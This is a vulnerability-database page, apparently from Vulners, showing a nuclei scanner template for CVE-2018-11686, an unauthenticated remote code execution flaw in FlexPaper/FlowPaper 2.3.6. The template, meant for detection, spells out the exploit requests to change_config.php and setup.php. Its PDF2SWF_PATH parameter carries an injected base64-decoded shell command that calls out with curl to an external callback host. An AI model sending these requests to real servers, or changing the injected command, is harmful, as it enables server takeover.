Lucene search
K

FlexPaper/FlowPaper 2.3.6 - Remote Code Execution

🗓️ 17 Jun 2026 05:14:44Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 18 Views

Remote code execution vulnerability in FlexPaper/FlowPaper 2.3.6 via setup.php and change_config.php.

Related
Refs
Code
ReporterTitlePublishedViews
Family
0day.today
Flexpaper PHP Publish Service 2.3.6 - Remote Code Execution Exploit #RCE
11 Mar 201900:00
zdt
Circl
CVE-2018-11686
14 Oct 202422:49
circl
CNVD
Devaldi FlexPaper Code Execution Vulnerability
12 Mar 201900:00
cnvd
CVE
CVE-2018-11686
3 Jul 201916:32
cve
Cvelist
CVE-2018-11686
3 Jul 201916:32
cvelist
Exploit DB
Flexpaper PHP Publish Service 2.3.6 - Remote Code Execution
11 Mar 201900:00
exploitdb
exploitpack
Flexpaper PHP Publish Service 2.3.6 - Remote Code Execution
11 Mar 201900:00
exploitpack
NVD
CVE-2018-11686
3 Jul 201917:15
nvd
Prion
Remote code execution
3 Jul 201917:15
prion
RedhatCVE
CVE-2018-11686
22 May 202505:13
redhatcve
Rows per page
id: CVE-2018-11686

info:
  name: FlexPaper/FlowPaper 2.3.6 - Remote Code Execution
  author: iamnoooob,pdresearch,pszyszkowski
  severity: critical
  description: |
    The Publish Service in FlexPaper (later renamed FlowPaper) 2.3.6 allows remote code execution via setup.php and change_config.php.
  impact: |
    Unauthenticated attackers can execute arbitrary code on the server through the Publish Service, leading to complete server compromise and access to all hosted documents.
  remediation: |
    Upgrade to FlowPaper version 2.3.7 or later, or remove the vulnerable Publish Service.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2018-11686
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2018-11686
    cwe-id: CWE-20
    epss-score: 0.49787
    epss-percentile: 0.98749
    cpe: cpe:2.3:a:flowpaper:flowpaper:2.3.6:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: flowpaper
    product: flowpaper
    shodan-query: title:"FlexPaper"
    fofa-query: title="FlexPaper"
  tags: cve,cve2018,flexpaper,flowpaper,rce,vkev,vuln

variables:
  cmd: "curl oast.pro"
  cmd_b: "{{base64(cmd)}}"

http:
  - raw:
      - |
        POST /php/change_config.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        SAVE_CONFIG=1&SWF_Directory=config/

      - |
        POST /php/change_config.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        SAVE_CONFIG=1&SWF_Directory=config/

    matchers:
      - type: dsl
        dsl:
          - 'contains(header, "index.php?msg=Configuration%20saved!")'
          - 'status_code == 302 || status_code == 200'
        condition: and
        internal: true

  - raw:
      - |
        GET /php/setup.php?step=4&PDF2SWF_PATH=echo+{{cmd_b}}+%7C+base64+-d+%7C+sh+%3Econfig/output.txt%3B HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /php/config/output.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body_2, "Interactsh Server")'
          - 'contains(content_type_2, "text/plain")'
          - 'contains(location_1, "index.php")'
        condition: and
# digest: 4b0a00483046022100ede1a55ae3823540c17de4e38e4c27dccfe9e848ba983be9c972e815dbd178d1022100c99f3c187b3e51459786635b6fe5428bd94aebc88363a931c46a9dec682f94e5:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
9.2High risk
Vulners AI Score9.2
CVSS 27.5
CVSS 39.8
EPSS0.49787
18